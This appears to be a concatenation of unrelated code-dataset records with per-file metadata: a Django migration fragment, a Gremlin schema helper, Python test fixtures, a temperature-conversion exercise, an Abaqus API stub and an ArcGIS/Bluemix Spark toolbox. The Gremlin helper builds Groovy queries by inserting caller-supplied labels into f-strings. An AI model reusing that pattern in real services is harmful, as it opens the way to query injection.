('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('chebyshev', models.FileField(blank=True, upload_to='problems/chebyshev/')),
('problem', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='chebyshev', to='molp_app.problem')),
],
),
]
| 60.571429 | 259 | 0.596055 | 505 | 4,664 | 5.372277 | 0.20396 | 0.064873 | 0.058975 | 0.07077 | 0.820494 | 0.820494 | 0.820494 | 0.793955 | 0.793955 | 0.793955 | 0 | 0.036198 | 0.224057 | 4,664 | 76 | 260 | 61.368421 | 0.713457 | 0.009648 | 0 | 0.666667 | 1 | 0 | 0.17089 | 0.029673 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.101449 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
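Both models in the migration store `maxtime` as a string choice, with `'inf'` standing for no limit. A small sketch of how a solver wrapper might map the stored value to a numeric time limit (the `maxtime_seconds` helper is hypothetical, not part of the app):

```python
import math

# Choice list copied from the migration above.
MAXTIME_CHOICES = [('inf', 'Infinity'), ('30', '30s'), ('60', '1m'), ('300', '5m'),
                   ('600', '10m'), ('1200', '20m'), ('1800', '30m'),
                   ('2400', '40m'), ('3600', '1h')]

def maxtime_seconds(value):
    """Map a stored maxtime choice to a float number of seconds."""
    if value not in {key for key, _ in MAXTIME_CHOICES}:
        raise ValueError(f'unknown maxtime choice: {value!r}')
    return math.inf if value == 'inf' else float(value)

assert maxtime_seconds('300') == 300.0
assert maxtime_seconds('inf') == math.inf
```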
28bf2d69da68600d800509b891de6da72ed6eaee | 5,783 | py | Python | invana_engine/gremlin/schema.py | rrmerugu/invana-engine | fc3f44b1417f3399b5a7e8414717c30eb4f78e0b | [
"Apache-2.0"
] | 9 | 2020-09-28T12:56:04.000Z | 2021-07-13T22:50:44.000Z | invana_engine/gremlin/schema.py | rrmerugu/invana-engine | fc3f44b1417f3399b5a7e8414717c30eb4f78e0b | [
"Apache-2.0"
] | 4 | 2020-12-22T02:42:32.000Z | 2021-03-16T10:47:57.000Z | invana_engine/gremlin/schema.py | rrmerugu/invana-engine | fc3f44b1417f3399b5a7e8414717c30eb4f78e0b | [
"Apache-2.0"
] | 2 | 2021-06-17T04:53:27.000Z | 2021-11-20T19:06:11.000Z | from .base import GremlinOperationBase, CRUDOperationsBase
from gremlin_python.process.strategies import *
from gremlin_python.process.traversal import Order
class SchemaOps(GremlinOperationBase):
def get_all_vertices_schema(self):
_ = self.gremlin_client.execute_query(
"g.V().group().by(label).by(properties().label().dedup().fold())",
serialize_elements=False
)
schema_data = []
for schema in _:
for k, v in schema.items():
schema_data.append(
{
"label": k,
"propertyKeys": v
}
)
return schema_data
def get_vertex_label_schema(self, label: str, namespace: str = None):
# TODO - fix performance
_ = self.gremlin_client.execute_query(
"g.V().group().by(label).by(properties().label().dedup().fold())",
serialize_elements=False
)
return {"label": label, "propertyKeys": _[0].get(label, [])}
def get_all_edges_schema(self):
_ = self.gremlin_client.execute_query(
"g.E().group().by(label).by(properties().label().dedup().fold())",
serialize_elements=False
)
schema_data = []
for schema in _:
for k, v in schema.items():
schema_data.append(
{
"label": k,
"propertyKeys": v
}
)
return schema_data
def get_edge_label_schema(self, label: str, namespace: str = None):
# TODO - fix performance
_ = self.gremlin_client.execute_query(
"g.E().group().by(label).by(properties().label().dedup().fold())",
serialize_elements=False
)
return {"label": label, "propertyKeys": _[0].get(label, [])}
def create_vertex_label_schema(self, label: str, namespace: str = None):
try:
_ = self.gremlin_client.execute_query(
f"""
mgmt = graph.openManagement()
person = mgmt.makeVertexLabel('{label}').make()
mgmt.commit()
""",
# "person = graph.addVertex(label, '" + label + "')",
serialize_elements=False
)
return {"status": True, "message": "ok"}
except Exception as e:
return {"status": False, "message": e.__str__()}
def create_edge_label_schema(self, label: str, multiplicity: str = None, namespace: str = None):
# https://docs.janusgraph.org/basics/schema/#edge-label-multiplicity
query = f"""
mgmt = graph.openManagement()
        edge_label = mgmt.makeEdgeLabel('{label}')"""
        if multiplicity:
            query += f".multiplicity(Multiplicity.{multiplicity.upper()})"
query += ".make()"
query += f"""
mgmt.commit()
"""
try:
_ = self.gremlin_client.execute_query(
query,
serialize_elements=False
)
return {"status": True, "message": "ok"}
except Exception as e:
return {"status": False, "message": e.__str__()}
def create_vertex_property_schema(self,
label: str,
property_key: str,
data_type: str,
cardinality: str):
"""
:param label:
:param property_key:
:param data_type:
:param cardinality: SINGLE, LIST , SET
:return:
"""
query = f"""
mgmt = graph.openManagement()
{property_key}_prop = mgmt.makePropertyKey('{property_key}')
"""
if data_type:
query += f".dataType({data_type}.class)"
if cardinality:
query += f".cardinality(Cardinality.{cardinality.upper()})"
query += ".make()"
query += f"""
{label}_label = mgmt.getVertexLabel("{label}")
mgmt.addProperties({label}_label, {property_key}_prop)
mgmt.commit()
"""
try:
_ = self.gremlin_client.execute_query(
query,
serialize_elements=False
)
return {"status": True, "message": "ok"}
except Exception as e:
return {"status": False, "message": e.__str__()}
def create_edge_property_schema(self,
label: str,
property_key: str,
data_type: str,
cardinality: str):
"""
:param label:
:param property_key:
:param data_type:
:param cardinality: SINGLE, LIST , SET
:return:
"""
query = f"""
mgmt = graph.openManagement()
{property_key}_prop = mgmt.makePropertyKey('{property_key}')
"""
if data_type:
query += f".dataType({data_type}.class)"
if cardinality:
query += f".cardinality(Cardinality.{cardinality.upper()})"
query += ".make()"
query += f"""
{label}_label = mgmt.getEdgeLabel("{label}")
mgmt.addProperties({label}_label, {property_key}_prop)
mgmt.commit()
"""
try:
_ = self.gremlin_client.execute_query(
query,
serialize_elements=False
)
return {"status": True, "message": "ok"}
except Exception as e:
return {"status": False, "message": e.__str__()}
| 33.427746 | 100 | 0.498184 | 519 | 5,783 | 5.33526 | 0.181118 | 0.026002 | 0.049115 | 0.069339 | 0.829541 | 0.822319 | 0.802817 | 0.774648 | 0.767425 | 0.749007 | 0 | 0.000553 | 0.3742 | 5,783 | 172 | 101 | 33.622093 | 0.764576 | 0.063289 | 0 | 0.738806 | 0 | 0 | 0.274528 | 0.151887 | 0 | 0 | 0 | 0.005814 | 0 | 1 | 0.059701 | false | 0 | 0.022388 | 0 | 0.179104 | 0.022388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
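`get_all_vertices_schema` and `get_all_edges_schema` both reshape the raw `group().by(label).by(...)` result — a list of dicts keyed by label — into a flat list of `{label, propertyKeys}` entries. That reshaping in isolation, on sample data (`flatten_schema` is an illustrative stand-in for the loop body):

```python
def flatten_schema(groups):
    """Reshape a Gremlin group()-by-label result (a list of dicts keyed
    by label) into the [{'label': ..., 'propertyKeys': ...}] form the
    SchemaOps get_all_*_schema methods return."""
    schema_data = []
    for schema in groups:
        for label, prop_keys in schema.items():
            schema_data.append({'label': label, 'propertyKeys': prop_keys})
    return schema_data

result = flatten_schema([{'person': ['name', 'age'], 'city': ['name']}])
# result == [{'label': 'person', 'propertyKeys': ['name', 'age']},
#            {'label': 'city', 'propertyKeys': ['name']}]
```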
28fa2ef3c41b8775d22c1ef80d6a472be871b226 | 129 | py | Python | Python/Tests/TestData/DebuggerProject/BreakpointNonMainFileRemoved.py | nanshuiyu/pytools | 9f9271fe8cf564b4f94e9456d400f4306ea77c23 | [
"Apache-2.0"
] | null | null | null | Python/Tests/TestData/DebuggerProject/BreakpointNonMainFileRemoved.py | nanshuiyu/pytools | 9f9271fe8cf564b4f94e9456d400f4306ea77c23 | [
"Apache-2.0"
] | null | null | null | Python/Tests/TestData/DebuggerProject/BreakpointNonMainFileRemoved.py | nanshuiyu/pytools | 9f9271fe8cf564b4f94e9456d400f4306ea77c23 | [
"Apache-2.0"
] | null | null | null | import BreakpointNonMainFileRemovedImported
BreakpointNonMainFileRemovedImported.f()
BreakpointNonMainFileRemovedImported.f() | 32.25 | 44 | 0.899225 | 6 | 129 | 19.333333 | 0.5 | 0.637931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054264 | 129 | 4 | 45 | 32.25 | 0.95082 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3a6e38f9a2e47204199e0a0684c7eb8c1b02803e | 134 | py | Python | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/infinite_loop/infinite_loop_test_input_request/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | null | null | null | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/infinite_loop/infinite_loop_test_input_request/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | 5 | 2021-04-08T22:02:15.000Z | 2022-02-10T14:53:45.000Z | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/infinite_loop/infinite_loop_test_input_request/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | null | null | null |
while True:
print("Long Line Long Line Long Line")
try:
print(input())
except Exception as ex:
print(ex)
| 16.75 | 42 | 0.574627 | 18 | 134 | 4.277778 | 0.611111 | 0.311688 | 0.311688 | 0.415584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.328358 | 134 | 7 | 43 | 19.142857 | 0.855556 | 0 | 0 | 0 | 0 | 0 | 0.218045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
3a88986f63d1ac5835122c8fac78673dd12f6519 | 619 | py | Python | _solutions/intermediate/test/test_doctest_a.py | sages-pl/2022-01-pythonsqlalchemy-aptiv | 1d6d856608e9dbe25b139e8968c48b7f46753b84 | [
"MIT"
] | null | null | null | _solutions/intermediate/test/test_doctest_a.py | sages-pl/2022-01-pythonsqlalchemy-aptiv | 1d6d856608e9dbe25b139e8968c48b7f46753b84 | [
"MIT"
] | null | null | null | _solutions/intermediate/test/test_doctest_a.py | sages-pl/2022-01-pythonsqlalchemy-aptiv | 1d6d856608e9dbe25b139e8968c48b7f46753b84 | [
"MIT"
] | null | null | null |
def celsius_to_kelvin(degrees):
if type(degrees) in (int, float):
return 273.15 + degrees
if type(degrees) is tuple:
return tuple(x + 273.15 for x in degrees)
if type(degrees) is list:
return list(x + 273.15 for x in degrees)
if type(degrees) is set:
return set(x + 273.15 for x in degrees)
raise TypeError('Invalid argument')
## Solution 2
# if type(degrees) in (int, float):
# return 273.15 + degrees
#
# if type(degrees) in (list, tuple, set):
# cls = type(degrees)
# return cls(x+273.15 for x in degrees)
#
# raise TypeError('Invalid argument')
| 23.807692 | 49 | 0.628433 | 96 | 619 | 4.03125 | 0.270833 | 0.198966 | 0.20155 | 0.258398 | 0.731266 | 0.702842 | 0.702842 | 0.702842 | 0.702842 | 0.702842 | 0 | 0.067245 | 0.25525 | 619 | 25 | 50 | 24.76 | 0.772234 | 0.345719 | 0 | 0 | 0 | 0 | 0.040712 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
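The file name (`test_doctest_a.py`) suggests the exercise is about doctests, yet the solution above carries none. A sketch combining the two solution variants shown, with the examples embedded as doctests that `doctest.testmod()` could pick up (values chosen so the float results print exactly):

```python
def celsius_to_kelvin(degrees):
    """Convert Celsius to Kelvin, preserving the container type.

    >>> celsius_to_kelvin(1)
    274.15
    >>> celsius_to_kelvin((0.0, 1.0))
    (273.15, 274.15)
    >>> celsius_to_kelvin('x')
    Traceback (most recent call last):
    ...
    TypeError: Invalid argument
    """
    if type(degrees) in (int, float):
        return 273.15 + degrees
    if type(degrees) in (list, tuple, set):
        cls = type(degrees)
        return cls(x + 273.15 for x in degrees)
    raise TypeError('Invalid argument')

assert celsius_to_kelvin(1) == 274.15
assert celsius_to_kelvin([0, 100]) == [273.15, 373.15]
```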
3ad34813102610b9523d4b48a2bb54b1a3a08596 | 5,912 | py | Python | src/abaqus/Canvas/AttributeColorMap.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/Canvas/AttributeColorMap.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/Canvas/AttributeColorMap.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from abaqusConstants import *
class AttributeColorMap:
"""The AttributeColorMap object is used to store values and attributes associated with
AttributeColorMap type objects. AttributeColorMap objects can be modified using the
methods described below. The methods accessed via the Viewport object cause the
AttributeColorMap object to be updated in the session.viewports[name].colorMappings
repository.
Attributes
----------
mapType: SymbolicConstant
A SymbolicConstant specifying the type of AttributeColorMap . Possible values are
MATERIAL_MAP, SECTION_MAP, PART_MAP, ELSET_MAP, AVERAGING_REGION_MAP, and ELTYPE_MAP.
overrides: dict
A :py:class:`~.Dictionary` object specifying a color mapping. Each key is of String type and specifies
an attribute in the map; the corresponding values specify the color definition to apply
to that attribute in the form (0|1, wire color, edge color, face color). The 0|1 defines
the active status for the attribute. For example:`overrides={
        'Part-1':(1,'#00FF00', '#00CCFF', '#00FF00')}`
defaultOverrides: dict
A :py:class:`~.Dictionary` object specifying a custom color mapping similar to overrides. For
        example:`defaultOverrides={ 'Copper':(1,'#00FF00', '#00CCFF',
        '#00FF00')}`The color mapping can contain keys that have not been
created. When the key is created, it gets the appropriate values from this mapping.
attributeColors: dict
A :py:class:`~.Dictionary` object specifying the color settings of each attribute as described in the
[updateOverrides
        ](https://help.3ds.com/2022/english/DSSIMULIA_Established/SIMACAEKERRefMap/simaker-c-attributecolormappyc.htm?ContextScope=all#simaker-attributecolormapupdateoverridespyc)method.
Notes
-----
This object can be accessed by:
.. code-block::
session.viewports[name].colorMappings[name]
"""
# A SymbolicConstant specifying the type of AttributeColorMap . Possible values are
# MATERIAL_MAP, SECTION_MAP, PART_MAP, ELSET_MAP, AVERAGING_REGION_MAP, and ELTYPE_MAP.
mapType: SymbolicConstant = None
# A Dictionary object specifying a color mapping. Each key is of String type and specifies
# an attribute in the map; the corresponding values specify the color definition to apply
# to that attribute in the form (0|1, wire color, edge color, face color). The 0|1 defines
# the active status for the attribute. For example:`overrides={
# 'Part-1':(1,'#00FF00', '#00CCFF', '#00FF00')}`
overrides: dict = None
# A Dictionary object specifying a custom color mapping similar to overrides. For
    # example:`defaultOverrides={ 'Copper':(1,'#00FF00', '#00CCFF',
# '#00FF00')}`The color mapping can contain keys that have not been
# created. When the key is created, it gets the appropriate values from this mapping.
defaultOverrides: dict = None
# A Dictionary object specifying the color settings of each attribute as described in the
# [updateOverrides
# ](https://help.3ds.com/2022/english/DSSIMULIA_Established/SIMACAEKERRefMap/simaker-c-attributecolormappyc.htm?ContextScope=all#simaker-attributecolormapupdateoverridespyc)method.
attributeColors: dict = None
def setDefaults(self):
"""This method resets the AttributeColorMap object to its default state.
"""
pass
def setValues(self, overrides: dict = None, defaultOverrides: dict = None):
"""This method modifies the AttributeColorMap object.
Parameters
----------
overrides
A Dictionary object specifying a color mapping. Each key is of String type and specifies
an attribute in the map; the corresponding values specify the color definition to apply
to that attribute in the form (0|1, wire color, edge color, face color). The 0|1 defines
the active status for the attribute. For example:`overrides={
'Part-1':(1,'#00FF00', '#00CCFF', '#00FF00')}`
defaultOverrides
A Dictionary object specifying a custom color mapping similar to overrides. For
            example:`defaultOverrides={ 'Copper':(1,'#00FF00', '#00CCFF',
'#00FF00')}`The color mapping can contain keys that have not been
created. When the key is created, it gets the appropriate values from this mapping.
"""
pass
def updateOverrides(self, overrides: dict = None, defaultOverrides: dict = None):
"""This method specifies additional overrides to be added to the current object definition.
Parameters
----------
overrides
A Dictionary object specifying a color mapping. Each key is of String type and specifies
an attribute in the map; the corresponding values specify the color definition to apply
to that attribute in the form (0|1, wire color, edge color, face color). The 0|1 defines
the active status for the attribute. For example:`overrides={
'Part-1':(1,'#00FF00', '#00CCFF', '#00FF00')}`
defaultOverrides
A Dictionary object specifying a custom color mapping similar to overrides. For
            example:`defaultOverrides={ 'Copper':(1,'#00FF00', '#00CCFF',
'#00FF00')}`The color mapping can contain keys that have not been
created. When the key is created, it gets the appropriate values from this mapping.
"""
pass
| 55.773585 | 185 | 0.647835 | 684 | 5,912 | 5.576023 | 0.200292 | 0.037756 | 0.06817 | 0.056633 | 0.775302 | 0.775302 | 0.769795 | 0.766649 | 0.760357 | 0.731515 | 0 | 0.027544 | 0.275372 | 5,912 | 105 | 186 | 56.304762 | 0.862745 | 0.841171 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.083333 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
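Every override value documented above has the shape `(0|1, wire color, edge color, face color)` with `#RRGGBB` color strings. A small validator for that shape (the `validate_override` helper is hypothetical, not part of the Abaqus scripting API):

```python
def validate_override(entry):
    """Validate one color-mapping value of the documented form
    (0|1, wire color, edge color, face color)."""
    active, *colors = entry
    if active not in (0, 1):
        raise ValueError('active flag must be 0 or 1')
    for color in colors:
        ok = (color.startswith('#') and len(color) == 7
              and all(c in '0123456789abcdefABCDEF' for c in color[1:]))
        if not ok:
            raise ValueError(f'bad color: {color!r}')
    return True

overrides = {'Part-1': (1, '#00FF00', '#00CCFF', '#00FF00')}
assert all(validate_override(v) for v in overrides.values())
```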
aafe66c390015358a1ecea40c204c93b2642b533 | 26,477 | pyt | Python | GeoBinToolbox.pyt | mraad/arcgis-bluemix | 1e3abe82f07336c3f89ea1a6cb0ef9f7c6f93c89 | [
"Apache-2.0"
] | 2 | 2017-03-07T20:21:33.000Z | 2017-07-06T20:00:23.000Z | GeoBinToolbox.pyt | mraad/arcgis-bluemix | 1e3abe82f07336c3f89ea1a6cb0ef9f7c6f93c89 | [
"Apache-2.0"
] | 1 | 2017-03-07T23:38:50.000Z | 2017-03-08T17:30:05.000Z | GeoBinToolbox.pyt | mraad/arcgis-bluemix | 1e3abe82f07336c3f89ea1a6cb0ef9f7c6f93c89 | [
"Apache-2.0"
] | null | null | null | import arcpy
import io
import json
import os
import requests
import swiftclient.client as swiftclient
import time
from urllib.parse import urlparse
class Toolbox(object):
def __init__(self):
self.alias = "GeoBinToolbox"
self.label = "GeoBin Toolbox"
        self.tools = [
            UploadTool,
            DownloadTool,
            RemoveTool,
            GeoBinTool
        ]
class UploadTool(object):
def __init__(self):
self.label = "Upload GeoBin"
self.description = "Upload GeoBin"
self.canRunInBackground = True
def getParameterInfo(self):
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
py_path = arcpy.Parameter(
name="py_path",
displayName="GeoBin Python Path",
direction="Input",
datatype="File",
parameterType="Required")
py_path.value = os.path.join(os.path.dirname(__file__), "GeoBin.py")
return [bm_path, py_path]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[0].valueAsText
py_path = parameters[1].valueAsText
head, tail = os.path.split(py_path)
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
spark = bluemix["spark"]
with open(py_path, "rb") as data:
url = "https://spark.bluemix.net/tenant/data/{}/{}".format(spark["instance_id"], tail)
headers = {
"X-Spark-service-instance-id": spark["instance_id"]
}
r = requests.put(url,
auth=(spark["tenant_id"], spark["tenant_secret"]),
headers=headers,
data=data
)
arcpy.AddMessage(json.dumps(r.json()))
class DownloadTool(object):
def __init__(self):
self.label = "Download Python File"
self.description = "Download Python File"
self.canRunInBackground = True
def getParameterInfo(self):
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
py_path = arcpy.Parameter(
name="py_path",
displayName="GeoBin Python Path",
direction="Input",
datatype="File",
parameterType="Required")
py_path.value = os.path.join(os.path.dirname(__file__), "GeoBin.py")
return [bm_path, py_path]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[0].valueAsText
py_path = parameters[1].valueAsText
head, tail = os.path.split(py_path)
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
spark = bluemix["spark"]
url = "https://spark.bluemix.net/tenant/data/{}/{}".format(spark["instance_id"], tail)
headers = {
"X-Spark-service-instance-id": spark["instance_id"]
}
r = requests.get(url,
auth=(spark["tenant_id"], spark["tenant_secret"]),
headers=headers
)
arcpy.AddMessage(r.text)
class RemoveTool(object):
def __init__(self):
self.label = "Remove GeoBin"
self.description = "Remove GeoBin"
self.canRunInBackground = True
def getParameterInfo(self):
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
return [bm_path]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[0].valueAsText
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
spark = bluemix["spark"]
url = "https://spark.bluemix.net/tenant/data/" + spark["instance_id"]
headers = {
"X-Spark-service-instance-id": spark["instance_id"]
}
r = requests.delete(url,
auth=(spark["tenant_id"], spark["tenant_secret"]),
headers=headers
)
resp = r.json()
if "file_error" in resp:
arcpy.AddWarning(json.dumps(resp))
else:
arcpy.AddMessage(json.dumps(resp))
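`GeoBinTool.check_status` below polls the Spark submission status endpoint until the driver leaves the RUNNING state or a retry budget is spent. The polling loop in isolation, with `fetch` standing in for the authenticated `requests.get` call (a hypothetical sketch):

```python
import itertools

def poll_status(fetch, max_tries=30):
    """Yield (attempt, response) pairs until the driver leaves the
    RUNNING state or max_tries polls have been made; `fetch` stands in
    for the authenticated requests.get call."""
    for attempt in itertools.count(1):
        resp = fetch()
        yield attempt, resp
        if attempt >= max_tries or resp['driverState'] != 'RUNNING':
            break

# Simulated endpoint: RUNNING once, then FINISHED.
states = iter([{'success': True, 'driverState': 'RUNNING'},
               {'success': True, 'driverState': 'FINISHED'}])
history = list(poll_status(lambda: next(states)))
# history has two entries; the last response is FINISHED
```

Yielding each response, as `check_status` does, lets the caller update the progressor label between polls.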
class GeoBinTool(object):
def __init__(self):
self.wait_try = 0
self.wait_max = 30
self.wait_sec = 7
self.running = True
self.spark = {}
self.storage = {}
self.label = "GeoBin Analysis"
self.description = "GeoBin Analysis"
self.canRunInBackground = True
def getParameterInfo(self):
out_fc = arcpy.Parameter(
name="out_fc",
displayName="out_fc",
direction="Output",
datatype="Feature Layer",
parameterType="Derived")
out_fc.symbology = os.path.join(os.path.dirname(__file__), "GeoBin.lyrx")
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
input_path = arcpy.Parameter(
name="input_path",
displayName="Swift Input Path",
direction="Input",
datatype="String",
parameterType="Required")
input_path.value = "swift2d://trips.thunder/trips-1M.csv"
output_path = arcpy.Parameter(
name="output_path",
displayName="Swift Output Path",
direction="Input",
datatype="String",
parameterType="Required")
output_path.value = "swift2d://output.thunder/GeoBins"
bin_size = arcpy.Parameter(
name="bin_size",
displayName="Bin Size",
direction="Input",
datatype="String",
parameterType="Required")
bin_size.value = "0.001"
del_folder = arcpy.Parameter(
name="del_folder",
displayName="Delete Work Folder",
direction="Input",
datatype="Boolean",
parameterType="Optional")
del_folder.value = True
return [out_fc, bm_path, input_path, output_path, bin_size, del_folder]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def check_status(self):
while self.running and self.wait_try < self.wait_max:
time.sleep(self.wait_sec)
self.wait_try += 1
headers = {"X-Requested-With": "spark-submit"}
data = {
"sparkProperties": {
"spark.service.tenant_id": self.spark["tenant_id"],
"spark.service.instance_id": self.spark["instance_id"],
"spark.service.tenant_secret": self.spark["tenant_secret"],
"spark.service.spark_version": "2.0"
}
}
r = requests.get("https://spark.bluemix.net/v1/submissions/status/" + self.spark["submissionId"],
headers=headers,
json=data
)
resp = r.json()
arcpy.SetProgressorLabel("{} {}".format(resp["driverState"], self.wait_try))
self.running = resp["success"] and resp["driverState"] == "RUNNING"
yield resp
    def del_workdir(self):
        url = "https://spark.bluemix.net/tenant/data/workdir/" + self.spark["submissionId"]
        headers = {
            "X-Spark-service-instance-id": self.spark["instance_id"]
        }
        r = requests.delete(url,
                            auth=(self.spark["tenant_id"], self.spark["tenant_secret"]),
                            headers=headers
                            )
        arcpy.AddMessage(json.dumps(r.json()))
    def insert_bins(self, fc, lines):
        # Each part-file line has the form b"x,y,population".
        with arcpy.da.InsertCursor(fc, ["SHAPE@XY", "POP"]) as cursor:
            for line in lines:
                t = line.decode().rstrip().split(",")
                if len(t) == 3:
                    shape_x = float(t[0])
                    shape_y = float(t[1])
                    pop = int(t[2])
                    cursor.insertRow(((shape_x, shape_y), pop))
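The row-parsing half of `insert_bins` is independent of arcpy and can be factored out as a pure function for testing. A minimal sketch (the function name and sample rows are hypothetical):

```python
def parse_bin_line(raw):
    """Parse one b"x,y,pop" part-file line into ((x, y), pop),
    or None for malformed rows (mirrors the len(t) == 3 guard)."""
    t = raw.decode().rstrip().split(",")
    if len(t) != 3:
        return None
    return ((float(t[0]), float(t[1])), int(t[2]))

rows = [b"-122.41,37.77,42\n", b"bad line\n", b"0.0,0.0,7\n"]
bins = [b for b in map(parse_bin_line, rows) if b is not None]
print(bins)  # [((-122.41, 37.77), 42), ((0.0, 0.0), 7)]
```

Silently skipping malformed rows matches the original's behaviour, where Spark part files may contain empty trailing lines.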
    def import_bins(self, parameters):
        # The output path has the form swift2d://<container>.<service>/<name>.
        url = urlparse(parameters[3].value)
        container, _ = url.netloc.split(".")
        name = url.path[1:]
        part = name + "/part"
        in_memory = True
        if in_memory:
            ws = "in_memory"
            fc = ws + "/" + name
        else:
            fc = os.path.join(arcpy.env.scratchGDB, name)
            ws = os.path.dirname(fc)
        if arcpy.Exists(fc):
            arcpy.management.Delete(fc)
        sp_ref = arcpy.SpatialReference(4326)
        arcpy.management.CreateFeatureclass(ws, name, "POINT",
                                            spatial_reference=sp_ref,
                                            has_m="DISABLED",
                                            has_z="DISABLED")
        arcpy.management.AddField(fc, "POP", "LONG")
        arcpy.SetProgressorLabel("Finding Parts...")
        conn = swiftclient.Connection(
            key=self.storage["password"],
            authurl=self.storage["auth_url"] + "/v3",
            auth_version="3",
            os_options={
                "project_id": self.storage["projectId"],
                "user_id": self.storage["userId"],
                "region_name": self.storage["region"]
            })
        for data in conn.get_container(container)[1]:
            object_name = data['name']
            if object_name.startswith(part):
                arcpy.SetProgressorLabel(object_name)
                _, body = conn.get_object(container, object_name)
                self.insert_bins(fc, io.BytesIO(body))
        parameters[0].value = fc
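The first few lines of `import_bins` decompose a `swift2d://` URL into the Object Storage container and the object-name prefix of the Spark part files. Standard-library `urlparse` handles the custom scheme because the authority syntax (`//netloc/path`) is scheme-independent. A standalone sketch (`split_swift_path` is a hypothetical helper name):

```python
from urllib.parse import urlparse  # "from urlparse import urlparse" on Python 2

def split_swift_path(path):
    """Split a swift2d://<container>.<service>/<name> URL into its
    container, service, and object-name prefix, as import_bins does."""
    url = urlparse(path)
    container, service = url.netloc.split(".")
    name = url.path[1:]  # drop the leading "/"
    return container, service, name

container, service, name = split_swift_path("swift2d://output.thunder/GeoBins")
print(container, service, name)  # output thunder GeoBins
```

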